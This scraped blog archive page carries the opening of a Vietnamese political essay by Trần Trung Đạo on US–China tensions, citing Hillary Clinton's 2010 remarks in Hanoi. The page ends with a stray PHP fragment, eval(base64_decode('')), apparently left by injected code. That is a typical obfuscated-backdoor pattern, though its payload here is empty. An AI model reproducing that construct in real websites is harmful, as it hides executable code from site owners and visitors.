Archive for August 24th, 2010

Trần Trung Đạo:  Tranh chấp Mỹ - Trung, một cảnh giác cho lòng yêu nước

Trần Trung Đạo: Tranh chấp Mỹ – Trung, một cảnh giác cho lòng yêu nước

Tại Diễn đàn Khu vực về Hợp tác an ninh ở châu Á tổ chức tại Hà Nội hôm 23 tháng Bảy, 2010, Ngoại Trưởng Hoa Kỳ Hillary Clinton tuyên bố: “Hoa Kỳ, giống như các quốc gia khác, có quyền lợi quốc gia về tự do hàng hải, mở cửa những

08.24.2010 | Tiểu Luận- Chính Luận |

4 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>